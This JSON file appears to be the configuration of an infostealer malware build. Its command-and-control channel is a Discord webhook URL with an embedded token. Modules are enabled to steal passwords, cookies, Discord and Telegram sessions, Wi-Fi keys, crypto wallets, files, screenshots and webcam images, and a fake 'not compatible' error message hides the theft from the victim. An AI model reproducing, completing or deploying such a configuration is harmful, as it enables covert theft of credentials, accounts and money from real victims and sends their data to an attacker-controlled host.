{
    "settings": {
        "c2": [
            0,
            "https://discord.com/api/webhooks/1287545391276883989/cjf7AGLBJdX0xjzo8rpJyfrsRoeDbSt9wqZa_7Od3vNEZlLsH8Z3WZx9wot0xs4QakQU"
        ],
        "mutex": "Chii3g2verb6RdcT",
        "pingme": true,
        "vmprotect": false,
        "startup": false,
        "melt": false,
        "uacBypass": false,
        "archivePassword": "blank123",
        "consoleMode": 0,
        "debug": false,
        "pumpedStubSize": 0,
        "boundFileRunOnStartup": false
    },
    "modules": {
        "captureWebcam": true,
        "capturePasswords": true,
        "captureCookies": true,
        "captureHistory": true,
        "captureAutofills": false,
        "captureDiscordTokens": true,
        "captureGames": true,
        "captureWifiPasswords": true,
        "captureSystemInfo": true,
        "captureScreenshot": true,
        "captureTelegramSession": true,
        "captureCommonFiles": true,
        "captureWallets": true,
        "fakeError": [
            true,
            [
                "Uh Oh!",
                "This app is not compatible with your device",
                0
            ]
        ],
        "blockAvSites": false,
        "discordInjection": false
    }
}